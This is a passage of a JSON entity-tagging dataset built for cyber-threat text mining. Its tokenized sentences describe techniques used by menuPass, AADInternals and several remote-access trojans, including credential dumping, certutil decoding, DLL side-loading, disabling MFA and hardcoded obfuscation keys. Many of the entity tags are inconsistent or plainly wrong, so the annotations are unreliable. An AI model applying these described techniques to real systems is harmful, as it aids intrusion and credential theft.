"ner_tags": [ - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-Features", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "menuPass", - "has", - "used", - "DLL", - "search", - "order", - "hijacking." - ], - "ner_tags": [ - "O", - "O", - "O", - "B-Way", - "I-Way", - "I-Way", - "O" - ] - }, - { - "tokens": [ - "menuPass", - "has", - "used", - "DLL", - "side-loading", - "to", - "launch", - "versions", - "of", - "Mimikatz", - "and", - "PwDump6", - "as", - "well", - "as", - "UPPERCUT." - ], - "ner_tags": [ - "O", - "O", - "O", - "B-Way", - "O", - "O", - "O", - "O", - "O", - "B-Way", - "O", - "B-Way", - "O", - "O", - "O", - "B-Way" - ] - }, - { - "tokens": [ - "menuPass", - "has", - "collected", - "various", - "files", - "from", - "the", - "compromised", - "computers." - ], - "ner_tags": [ - "O", - "O", - "O", - "B-Purp", - "B-Features", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "menuPass", - "has", - "collected", - "data", - "from", - "remote", - "systems", - "by", - "mounting", - "network", - "shares", - "with", - "<code>net", - "use</code>", - "and", - "using", - "Robocopy", - "to", - "transfer", - "data." - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-Way", - "O", - "I-Purp", - "O" - ] - }, - { - "tokens": [ - "menuPass", - "has", - "used", - "certutil", - "in", - "a", - "macro", - "to", - "decode", - "base64-encoded", - "content", - "contained", - "in", - "a", - "dropper", - "document", - "attached", - "to", - "an", - "email.", - "The", - "group", - "has", - "also", - "used", - "<code>certutil", - "-decode</code>", - "to", - "decode", - "files", - "on", - "the", - "victim’s", - "machine", - "when", - "dropping", - "UPPERCUT." - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-SamFile", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-SamFile" - ] - }, - { - "tokens": [ - "menuPass", - "has", - "used", - "the", - "Microsoft", - "administration", - "tool", - "csvde.exe", - "to", - "export", - "Active", - "Directory", - "data." - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-SamFile", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "menuPass", - "has", - "registered", - "malicious", - "domains", - "for", - "use", - "in", - "intrusion", - "campaigns." - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-Org", - "B-OffAct" - ] - }, - { - "tokens": [ - "menuPass", - "has", - "encoded", - "strings", - "in", - "its", - "malware", - "with", - "base64", - "as", - "well", - "as", - "with", - "a", - "simple,", - "single-byte", - "XOR", - "obfuscation", - "using", - "key", - "0x40." - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "menuPass", - "has", - "leveraged", - "vulnerabilities", - "in", - "Pulse", - "Secure", - "VPNs", - "to", - "hijack", - "sessions." - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-Tool", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "menuPass", - "has", - "used", - "tools", - "to", - "exploit", - "the", - "ZeroLogon", - "vulnerability", - "(CVE-2020-1472)." - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-Features", - "B-Exp", - "B-Features" - ] - }, - { - "tokens": [ - "menuPass", - "has", - "used", - "a", - "global", - "service", - "provider's", - "IP", - "as", - "a", - "proxy", - "for", - "C2", - "traffic", - "from", - "a", - "victim." - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "O", - "I-Org", - "O", - "O", - "O", - "O", - "O", - "O", - "B-Features", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "menuPass", - "has", - "used", - "dynamic", - "DNS", - "service", - "providers", - "to", - "host", - "malicious", - "domains." - ], - "ner_tags": [ - "O", - "O", - "O", - "I-Org", - "B-Purp", - "I-Org", - "I-Org", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "A", - "menuPass", - "macro", - "deletes", - "files", - "after", - "it", - "has", - "decoded", - "and", - "decompressed", - "them." - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "menuPass", - "has", - "searched", - "compromised", - "systems", - "for", - "folders", - "of", - "interest", - "including", - "those", - "related", - "to", - "HR,", - "audit", - "and", - "expense,", - "and", - "meeting", - "memos." - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-Way", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "menuPass", - "has", - "installed", - "updates", - "and", - "new", - "malware", - "on", - "victims." - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "menuPass", - "has", - "used", - "<code>InstallUtil.exe</code>", - "to", - "execute", - "malicious", - "software." - ], - "ner_tags": [ - "O", - "O", - "O", - "B-SamFile", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "menuPass", - "has", - "used", - "key", - "loggers", - "to", - "steal", - "usernames", - "and", - "passwords." - ], - "ner_tags": [ - "O", - "O", - "O", - "I-Tool", - "I-Tool", - "O", - "I-Purp", - "I-Purp", - "I-Purp", - "B-Purp" - ] - }, - { - "tokens": [ - "menuPass", - "has", - "used", - "a", - "modified", - "version", - "of", - "pentesting", - "tools", - "wmiexec.vbs", - "and", - "secretsdump.py", - "to", - "dump", - "credentials." - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-SamFile", - "O", - "B-SamFile", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "menuPass", - "stages", - "data", - "prior", - "to", - "exfiltration", - "in", - "multi-part", - "archives,", - "often", - "saved", - "in", - "the", - "Recycle", - "Bin." - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "menuPass", - "has", - "attempted", - "to", - "get", - "victims", - "to", - "open", - "malicious", - "files", - "such", - "as", - "Windows", - "Shortcuts", - "(.lnk)", - "and/or", - "Microsoft", - "Office", - "documents,", - "sent", - "via", - "email", - "as", - "part", - "of", - "spearphishing", - "campaigns." - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-SamFile", - "O", - "O", - "O", - "I-Tool", - "B-SecTeam", - "B-SamFile", - "O", - "I-Tool", - "I-Tool", - "O", - "O", - "O", - "B-Way", - "O", - "O", - "O", - "B-Org", - "B-OffAct" - ] - }, - { - "tokens": [ - "menuPass", - "has", - "used", - "esentutl", - "to", - "change", - "file", - "extensions", - "to", - "their", - "true", - "type", - "that", - "were", - "masquerading", - "as", - ".txt", - "files." - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-SamFile", - "O" - ] - }, - { - "tokens": [ - "menuPass", - "has", - "been", - "seen", - "changing", - "malicious", - "files", - "to", - "appear", - "legitimate." - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "O", - "B-SamFile", - "I-SamFile", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "menuPass", - "has", - "used", - "Ntdsutil", - "to", - "dump", - "credentials." - ], - "ner_tags": [ - "O", - "O", - "O", - "B-Way", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "menuPass", - "has", - "used", - "native", - "APIs", - "including", - "<code>GetModuleFileName</code>,", - "<code>lstrcat</code>,", - "<code>CreateFile</code>,", - "and", - "<code>ReadFile</code>." - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "O", - "O", - "B-SamFile", - "B-SamFile", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "menuPass", - "has", - "used", - "tcping.exe,", - "similar", - "to", - "Ping,", - "to", - "probe", - "port", - "status", - "on", - "systems", - "of", - "interest." - ], - "ner_tags": [ - "O", - "O", - "O", - "B-SamFile", - "O", - "O", - "B-Tool", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "menuPass", - "uses", - "PowerSploit", - "to", - "inject", - "shellcode", - "into", - "PowerShell." - ], - "ner_tags": [ - "O", - "O", - "B-Way", - "O", - "B-Way", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "menuPass", - "has", - "used", - "process", - "hollowing", - "in", - "iexplore.exe", - "to", - "load", - "the", - "RedLeaves", - "implant." - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "O", - "O", - "B-SamFile", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "menuPass", - "has", - "staged", - "data", - "on", - "remote", - "MSP", - "systems", - "or", - "other", - "victim", - "networks", - "prior", - "to", - "exfiltration." - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "menuPass", - "has", - "used", - "RDP", - "connections", - "to", - "move", - "across", - "the", - "victim", - "network." - ], - "ner_tags": [ - "O", - "O", - "O", - "B-Way", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "menuPass", - "uses", - "scripts", - "to", - "enumerate", - "IP", - "ranges", - "on", - "the", - "victim", - "network.", - "menuPass", - "has", - "also", - "issued", - "the", - "command", - "<code>net", - "view", - "/domain</code>", - "to", - "a", - "PlugX", - "implant", - "to", - "gather", - "information", - "about", - "remote", - "systems", - "on", - "the", - "network." - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-Way", - "O", - "O", - "I-Purp", - "I-Purp", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "menuPass", - "has", - "renamed", - "certutil", - "and", - "moved", - "it", - "to", - "a", - "different", - "location", - "on", - "the", - "system", - "to", - "avoid", - "detection", - "based", - "on", - "use", - "of", - "the", - "tool." - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "menuPass", - "has", - "used", - "Putty", - "Secure", - "Copy", - "Client", - "(PSCP)", - "to", - "transfer", - "data." - ], - "ner_tags": [ - "O", - "O", - "O", - "B-Way", - "I-Tool", - "I-Tool", - "I-Tool", - "B-Way", - "O", - "O", - "B-Purp" - ] - }, - { - "tokens": [ - "menuPass", - "has", - "used", - "a", - "script", - "(atexec.py)", - "to", - "execute", - "a", - "command", - "on", - "a", - "target", - "machine", - "via", - "Task", - "Scheduler." - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "O", - "B-SamFile", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "menuPass", - "has", - "used", - "a", - "modified", - "version", - "of", - "pentesting", - "tools", - "wmiexec.vbs", - "and", - "secretsdump.py", - "to", - "dump", - "credentials." - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-SamFile", - "O", - "B-SamFile", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "menuPass", - "has", - "sent", - "malicious", - "Office", - "documents", - "via", - "email", - "as", - "part", - "of", - "spearphishing", - "campaigns", - "as", - "well", - "as", - "executables", - "disguised", - "as", - "documents." - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-Way", - "O", - "O", - "O", - "B-Org", - "B-OffAct", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "menuPass", - "has", - "used", - "several", - "tools", - "to", - "scan", - "for", - "open", - "NetBIOS", - "nameservers", - "and", - "enumerate", - "NetBIOS", - "sessions." - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-Way", - "B-Tool" - ] - }, - { - "tokens": [ - "menuPass", - "has", - "used", - "<code>net", - "use</code>", - "to", - "conduct", - "connectivity", - "checks", - "to", - "machines." - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "menuPass", - "has", - "used", - "and", - "modified", - "open-source", - "tools", - "like", - "Impacket,", - "Mimikatz,", - "and", - "pwdump." - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-Way", - "B-Way", - "O", - "B-Way" - ] - }, - { - "tokens": [ - "menuPass", - "has", - "used", - "legitimate", - "access", - "granted", - "to", - "Managed", - "Service", - "Providers", - "in", - "order", - "to", - "access", - "victims", - "of", - "interest." - ], - "ner_tags": [ - "O", - "O", - "O", - "B-Way", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "menuPass", - "has", - "used", - "valid", - "accounts", - "including", - "shared", - "between", - "Managed", - "Service", - "Providers", - "and", - "clients", - "to", - "move", - "between", - "the", - "two", - "environments." - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "menuPass", - "executes", - "commands", - "using", - "a", - "command-line", - "interface", - "and", - "reverse", - "shell.", - "The", - "group", - "has", - "used", - "a", - "modified", - "version", - "of", - "pentesting", - "script", - "wmiexec.vbs", - "to", - "execute", - "commands.", - "menuPass", - "has", - "used", - "malicious", - "macros", - "embedded", - "inside", - "Office", - "documents", - "to", - "execute", - "files." - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-HackOrg", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-SamFile", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "menuPass", - "has", - "used", - "a", - "modified", - "version", - "of", - "pentesting", - "script", - "wmiexec.vbs,", - "which", - "logs", - "into", - "a", - "remote", - "machine", - "using", - "WMI." - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-SamFile", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-Way" - ] - }, - { - "tokens": [ - "3PARA", - "RAT", - "has", - "a", - "command", - "to", - "retrieve", - "metadata", - "for", - "files", - "on", - "disk", - "as", - "well", - "as", - "a", - "command", - "to", - "list", - "the", - "current", - "working", - "directory." - ], - "ner_tags": [ - "B-SamFile", - "B-SecTeam", - "O", - "O", - "O", - "O", - "I-Features", - "B-HackOrg", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-Features", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "3PARA", - "RAT", - "command", - "and", - "control", - "commands", - "are", - "encrypted", - "within", - "the", - "HTTP", - "C2", - "channel", - "using", - "the", - "DES", - "algorithm", - "in", - "CBC", - "mode", - "with", - "a", - "key", - "derived", - "from", - "the", - "MD5", - "hash", - "of", - "the", - "string", - "HYF54&%9&jkMCXuiS.", - "3PARA", - "RAT", - "will", - "use", - "an", - "8-byte", - "XOR", - "key", - "derived", - "from", - "the", - "string", - "HYF54&%9&jkMCXuiS", - "if", - "the", - "DES", - "decoding", - "fails" - ], - "ner_tags": [ - "B-SamFile", - "B-SecTeam", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-SamFile", - "B-SamFile", - "B-SecTeam", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-SamFile", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "3PARA", - "RAT", - "has", - "a", - "command", - "to", - "set", - "certain", - "attributes", - "such", - "as", - "creation/modification", - "timestamps", - "on", - "files." - ], - "ner_tags": [ - "B-SamFile", - "B-SecTeam", - "O", - "O", - "O", - "O", - "I-Features", - "I-Features", - "I-Features", - "O", - "O", - "B-Features", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "3PARA", - "RAT", - "uses", - "HTTP", - "for", - "command", - "and", - "control." - ], - "ner_tags": [ - "B-SamFile", - "B-SecTeam", - "O", - "B-Way", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "4H", - "RAT", - "has", - "the", - "capability", - "to", - "obtain", - "file", - "and", - "directory", - "listings." - ], - "ner_tags": [ - "B-SamFile", - "B-SecTeam", - "O", - "O", - "O", - "O", - "I-Features", - "I-Features", - "I-Features", - "I-Features", - "B-HackOrg" - ] - }, - { - "tokens": [ - "4H", - "RAT", - "has", - "the", - "capability", - "to", - "obtain", - "a", - "listing", - "of", - "running", - "processes", - "(including", - "loaded", - "modules)." - ], - "ner_tags": [ - "B-SamFile", - "B-SecTeam", - "O", - "O", - "O", - "O", - "I-Features", - "I-Features", - "I-Features", - "I-Features", - "O", - "B-Features", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "4H", - "RAT", - "obfuscates", - "C2", - "communication", - "using", - "a", - "1-byte", - "XOR", - "with", - "the", - "key", - "0xBE." - ], - "ner_tags": [ - "O", - "B-SecTeam", - "O", - "O", - "O", - "O", - "O", - "O", - "B-Tool", - "O", - "O", - "O", - "B-Way" - ] - }, - { - "tokens": [ - "4H", - "RAT", - "sends", - "an", - "OS", - "version", - "identifier", - "in", - "its", - "beacons." - ], - "ner_tags": [ - "B-SamFile", - "B-SecTeam", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "4H", - "RAT", - "uses", - "HTTP", - "for", - "command", - "and", - "control." - ], - "ner_tags": [ - "B-Idus", - "B-Tool", - "O", - "B-Way", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "4H", - "RAT", - "has", - "the", - "capability", - "to", - "create", - "a", - "remote", - "shell." - ], - "ner_tags": [ - "B-SamFile", - "B-SecTeam", - "O", - "O", - "O", - "O", - "B-Features", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "AADInternals", - "can", - "enumerate", - "Azure", - "AD", - "users." - ], - "ner_tags": [ - "B-SamFile", - "O", - "O", - "B-HackOrg", - "I-Org", - "O" - ] - }, - { - "tokens": [ - "AADInternals", - "can", - "create", - "new", - "Azure", - "AD", - "users." - ], - "ner_tags": [ - "B-SamFile", - "O", - "O", - "O", - "O", - "B-Tool", - "O" - ] - }, - { - "tokens": [ - "AADInternals", - "can", - "execute", - "commands", - "on", - "Azure", - "virtual", - "machines", - "using", - "the", - "VM", - "agent." - ], - "ner_tags": [ - "B-SamFile", - "O", - "B-Features", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-Way", - "O" - ] - }, - { - "tokens": [ - "AADInternals", - "can", - "enumerate", - "Azure", - "AD", - "groups." - ], - "ner_tags": [ - "B-SamFile", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "AADInternals", - "can", - "enumerate", - "information", - "about", - "a", - "variety", - "of", - "cloud", - "services,", - "such", - "as", - "Office", - "365", - "and", - "Sharepoint", - "instances", - "or", - "OpenID", - "Configurations." - ], - "ner_tags": [ - "B-SamFile", - "O", - "B-Features", - "B-Features", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-Tool", - "O", - "O", - "O", - "O", - "O", - "B-Way", - "B-Tool" - ] - }, - { - "tokens": [ - "AADInternals", - "can", - "gather", - "unsecured", - "credentials", - "for", - "Azure", - "AD", - "services,", - "such", - "as", - "Azure", - "AD", - "Connect,", - "from", - "a", - "local", - "machine." - ], - "ner_tags": [ - "B-SamFile", - "O", - "I-Features", - "B-HackOrg", - "B-Features", - "O", - "O", - "O", - "O", - "O", - "O", - "B-Way", - "I-Tool", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "AADInternals", - "can", - "collect", - "files", - "from", - "a", - "user’s", - "OneDrive." - ], - "ner_tags": [ - "B-SamFile", - "O", - "I-Features", - "I-Features", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "AADInternals", - "can", - "register", - "a", - "device", - "to", - "Azure", - "AD." - ], - "ner_tags": [ - "B-SamFile", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "AADInternals", - "can", - "gather", - "information", - "about", - "a", - "tenant’s", - "domains", - "using", - "public", - "Microsoft", - "APIs." - ], - "ner_tags": [ - "B-SamFile", - "O", - "I-Features", - "I-Features", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "AADInternals", - "can", - "check", - "for", - "the", - "existence", - "of", - "user", - "email", - "addresses", - "using", - "public", - "Microsoft", - "APIs." - ], - "ner_tags": [ - "B-SamFile", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "I-Tool", - "I-Tool", - "O" - ] - }, - { - "tokens": [ - "AADInternals", - "can", - "directly", - "download", - "cloud", - "user", - "data", - "such", - "as", - "OneDrive", - "files." - ], - "ner_tags": [ - "B-SamFile", - "O", - "O", - "I-Features", - "I-Features", - "O", - "B-Features", - "O", - "O", - "B-Way", - "B-Tool" - ] - }, - { - "tokens": [ - "AADInternals", - "can", - "inject", - "a", - "malicious", - "DLL", - "(`PTASpy`)", - "into", - "the", - "`AzureADConnectAuthenticationAgentService`", - "to", - "backdoor", - "Azure", - "AD", - "Pass-Through", - "Authentication." - ], - "ner_tags": [ - "B-SamFile", - "O", - "B-Way", - "O", - "B-Way", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "AADInternals", - "can", - "dump", - "secrets", - "from", - "the", - "Local", - "Security", - "Authority." - ], - "ner_tags": [ - "B-SamFile", - "O", - "B-Features", - "B-Way", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "AADInternals", - "can", - "modify", - "registry", - "keys", - "as", - "part", - "of", - "setting", - "a", - "new", - "pass-through", - "authentication", - "agent." - ], - "ner_tags": [ - "B-SamFile", - "O", - "I-Features", - "I-Features", - "I-Features", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "The", - "AADInternals", - "`Set-AADIntUserMFA`", - "command", - "can", - "be", - "used", - "to", - "disable", - "MFA", - "for", - "a", - "specified", - "user." - ], - "ner_tags": [ - "O", - "B-SamFile", - "B-SamFile", - "O", - "O", - "O", - "O", - "O", - "B-Features", - "B-HackOrg", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "AADInternals", - "is", - "written", - "and", - "executed", - "via", - "PowerShell." - ], - "ner_tags": [ - "B-SamFile", - "O", - "O", - "O", - "O", - "O", - "B-Way" - ] - }, - { - "tokens": [ - "AADInternals", - "can", - "gather", - "encryption", - "keys", - "from", - "Azure", - "AD", - "services", - "such", - "as", - "ADSync", - "and", - "Active", - "Directory", - "Federated", - "Services", - "servers." - ], - "ner_tags": [ - "B-SamFile", - "O", - "I-Features", - "I-Features", - "I-Features", - "O", - "O", - "O", - "O", - "O", - "O", - "B-Way", - "O", - "B-Tool", - "O", - "O", - "O", - "B-Tool" - ] - }, - { - "tokens": [ - "AADInternals", - "can", - "be", - "used", - "to", - "create", - "SAML", - "tokens", - "using", - "the", - "AD", - "Federated", - "Services", - "token", - "signing", - "certificate." - ], - "ner_tags": [ - "B-SamFile", - "O", - "O", - "O", - "O", - "I-Features", - "B-HackOrg", - "B-HackOrg", - "O", - "O", - "B-Tool", - "O", - "I-Tool", - "I-Tool", - "I-Tool", - "O" - ] - }, - { - "tokens": [ - "AADInternals", - "can", - "be", - "used", - "to", - "forge", - "Kerberos", - "tickets", - "using", - "the", - "password", - "hash", - "of", - "the", - "AZUREADSSOACC", - "account." - ], - "ner_tags": [ - "B-SamFile", - "O", - "O", - "O", - "O", - "B-Features", - "B-HackOrg", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-Way", - "O" - ] - }, - { - "tokens": [ - "AADInternals", - "can", - "send", - "\"consent", - "phishing\"", - "emails", - "containing", - "malicious", - "links", - "designed", - "to", - "steal", - "users’", - "access", - "tokens." - ], - "ner_tags": [ - "B-SamFile", - "O", - "O", - "O", - "O", - "B-Way", - "O", - "O", - "O", - "O", - "O", - "I-Purp", - "I-Purp", - "O", - "B-Purp" - ] - }, - { - "tokens": [ - "AADInternals", - "can", - "send", - "phishing", - "emails", - "containing", - "malicious", - "links", - "designed", - "to", - "collect", - "users’", - "credentials." - ], - "ner_tags": [ - "B-SamFile", - "O", - "O", - "B-Way", - "I-Way", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "AADInternals", - "can", - "steal", - "users’", - "access", - "tokens", - "via", - "phishing", - "emails", - "containing", - "malicious", - "links." - ], - "ner_tags": [ - "B-SamFile", - "O", - "B-Features", - "O", - "O", - "O", - "O", - "B-Way", - "I-Way", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "AADInternals", - "can", - "create", - "and", - "export", - "various", - "authentication", - "certificates,", - "including", - "those", - "associated", - "with", - "Azure", - "AD", - "joined/registered", - "devices." - ], - "ner_tags": [ - "B-SamFile", - "O", - "B-Features", - "O", - "I-Features", - "I-Features", - "B-HackOrg", - "B-Features", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "AADInternals", - "can", - "create", - "a", - "backdoor", - "by", - "converting", - "a", - "domain", - "to", - "a", - "federated", - "domain", - "which", - "will", - "be", - "able", - "to", - "authenticate", - "any", - "user", - "across", - "the", - "tenant.", - "AADInternals", - "can", - "also", - "modify", - "DesktopSSO", - "information." - ], - "ner_tags": [ - "B-SamFile", - "O", - "I-Features", - "I-Features", - "B-HackOrg", - "O", - "B-Features", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-Features", - "O", - "O", - "O", - "O", - "O", - "B-SamFile", - "O", - "O", - "I-Features", - "B-HackOrg", - "B-Features" - ] - }, - { - "tokens": [ - "ABK", - "has", - "the", - "ability", - "to", - "decrypt", - "AES", - "encrypted", - "payloads." - ], - "ner_tags": [ - "B-SamFile", - "O", - "O", - "O", - "O", - "B-Features", - "B-Tool", - "O", - "O" - ] - }, - { - "tokens": [ - "ABK", - "has", - "the", - "ability", - "to", - "download", - "files", - "from", - "C2." - ], - "ner_tags": [ - "B-SamFile", - "O", - "O", - "O", - "O", - "I-Features", - "I-Features", - "O", - "O" - ] - }, - { - "tokens": [ - "ABK", - "has", - "the", - "ability", - "to", - "inject", - "shellcode", - "into", - "svchost.exe." - ], - "ner_tags": [ - "B-SamFile", - "O", - "O", - "O", - "O", - "B-Features", - "O", - "O", - "B-Way" - ] - }, - { - "tokens": [ - "ABK", - "has", - "the", - "ability", - "to", - "identify", - "the", - "installed", - "anti-virus", - "product", - "on", - "the", - "compromised", - "host." - ], - "ner_tags": [ - "B-SamFile", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-Way", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "ABK", - "can", - "extract", - "a", - "malicious", - "Portable", - "Executable", - "(PE)", - "from", - "a", - "photo." - ], - "ner_tags": [ - "B-SamFile", - "O", - "B-Features", - "O", - "O", - "O", - "O", - "B-Way", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "ABK", - "has", - "the", - "ability", - "to", - "use", - "HTTP", - "in", - "communications", - "with", - "C2." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "O", - "O", - "B-Way", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "ABK", - "has", - "the", - "ability", - "to", - "use", - "cmd", - "to", - "run", - "a", - "Portable", - "Executable", - "(PE)", - "on", - "the", - "compromised", - "host." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-Tool", - "O", - "B-Way", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "ADVSTORESHELL", - "encrypts", - "with", - "the", - "3DES", - "algorithm", - "and", - "a", - "hardcoded", - "key", - "prior", - "to", - "exfiltration." - ], - "ner_tags": [ - "B-SamFile", - "O", - "O", - "O", - "B-Way", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "ADVSTORESHELL", - "compresses", - "output", - "data", - "generated", - "by", - "command", - "execution", - "with", - "a", - "custom", - "implementation", - "of", - "the", - "Lempel–Ziv–Welch", - "(LZW)", - "algorithm." - ], - "ner_tags": [ - "B-SamFile", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-Way", - "O", 